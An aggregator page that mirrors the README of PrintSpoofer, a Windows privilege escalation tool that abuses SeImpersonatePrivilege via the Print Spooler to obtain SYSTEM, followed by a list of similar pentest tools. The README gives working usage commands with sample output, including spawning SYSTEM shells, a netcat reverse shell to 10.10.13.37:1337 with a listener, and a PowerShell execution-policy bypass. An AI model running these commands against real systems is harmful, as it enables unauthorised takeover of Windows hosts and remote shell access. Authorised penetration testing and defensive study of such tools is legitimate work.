itm4n / Printspoofer
Abusing Impersonation Privileges on Windows 10 and Server 2019
Stars: ✭ 613
Programming Languages
c
50402 projects - #5 most used programming language
Labels
Projects that are alternatives of or similar to Printspoofer
Rdpassspray
Python3 tool to perform password spraying using RDP
Stars: ✭ 368 (-39.97%)
Mutual labels: pentest-tool
Sn1per
Attack Surface Management Platform | Sn1perSecurity LLC
Stars: ✭ 4,897 (+698.86%)
Mutual labels: pentest-tool
Yasuo
A ruby script that scans for vulnerable & exploitable 3rd-party web applications on a network
Stars: ✭ 517 (-15.66%)
Mutual labels: pentest-tool
Top25 Parameter
For basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon. 🛡️⚔️🧙
Stars: ✭ 388 (-36.7%)
Mutual labels: pentest-tool
Justtryharder
JustTryHarder, a cheat sheet which will aid you through the PWK course & the OSCP Exam. (Inspired by PayloadAllTheThings)
Stars: ✭ 450 (-26.59%)
Mutual labels: pentest-tool
Thc Archive
All releases of the security research group (a.k.a. hackers) The Hacker's Choice
Stars: ✭ 474 (-22.68%)
Mutual labels: pentest-tool
Nullinux
Internal penetration testing tool for Linux that can be used to enumerate OS information, domain information, shares, directories, and users through SMB.
Stars: ✭ 451 (-26.43%)
Mutual labels: pentest-tool
Stowaway
👻Stowaway -- Multi-hop Proxy Tool for pentesters
Stars: ✭ 500 (-18.43%)
Mutual labels: pentest-tool
Censys Subdomain Finder
⚡ Perform subdomain enumeration using the certificate transparency logs from Censys.
Stars: ✭ 402 (-34.42%)
Mutual labels: pentest-tool
Ehtools
Wi-Fi tools keep getting more and more accessible to beginners, and the Ehtools Framework is a framework of serious penetration tools that can be explored easily from within it. This powerful and simple tool can be used for everything from installing new add-ons to grabbing a WPA handshake in a matter of seconds. Plus, it's easy to install, set up, and utilize.
Stars: ✭ 422 (-31.16%)
Mutual labels: pentest-tool
Envizon
network visualization & vulnerability management/reporting
Stars: ✭ 382 (-37.68%)
Mutual labels: pentest-tool
Bigbountyrecon
BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation.
Stars: ✭ 541 (-11.75%)
Mutual labels: pentest-tool
PrintSpoofer
From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019.
For more information: https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/.
Usage
You can check the help message using the -h option.
C:\TOOLS>PrintSpoofer.exe -h
PrintSpoofer v0.1 (by @itm4n)
Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()
Arguments:
-c <CMD> Execute the command *CMD*
-i Interact with the new process in the current command prompt (default is non-interactive)
-d <ID> Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
-h That's me :)
Examples:
- Run PowerShell as SYSTEM in the current console
PrintSpoofer.exe -i -c powershell.exe
- Spawn a SYSTEM command prompt on the desktop of the session 1
PrintSpoofer.exe -d 1 -c cmd.exe
- Get a SYSTEM reverse shell
PrintSpoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"
Usage 1: Spawn a SYSTEM process and interact with it
If you have an interactive shell, you can create a new SYSTEM process in your current console.
Use case: bind shell, reverse shell, psexec.py, etc.
C:\TOOLS>PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19613.1000]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
nt authority\system
Usage 2: Spawn a SYSTEM process and exit
If you can execute commands but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.
Use case: WinRM, WebShell, wmiexec.py, smbexec.py, etc.
Create a reverse shell:
C:\TOOLS>PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Netcat listener:
C:\TOOLS>nc.exe -l -p 1337
Microsoft Windows [Version 10.0.19613.1000]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
nt authority\system
Usage 3: Spawn a SYSTEM process on a desktop
If you are logged on locally or via RDP (including VDI), you can spawn a SYSTEM command prompt on your desktop. First, check your session ID with the command qwinsta and then specify this value with the option -d.
Use case: Terminal Session (RDP), VDI
C:\TOOLS>qwinsta
SESSIONNAME USERNAME ID STATE TYPE DEVICE
services 0 Disc
console Administrator 1 Active
>rdp-tcp#3 lab-user 3 Active
rdp-tcp 65536 Listen
C:\TOOLS>PrintSpoofer.exe -d 3 -c "powershell -ep bypass"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].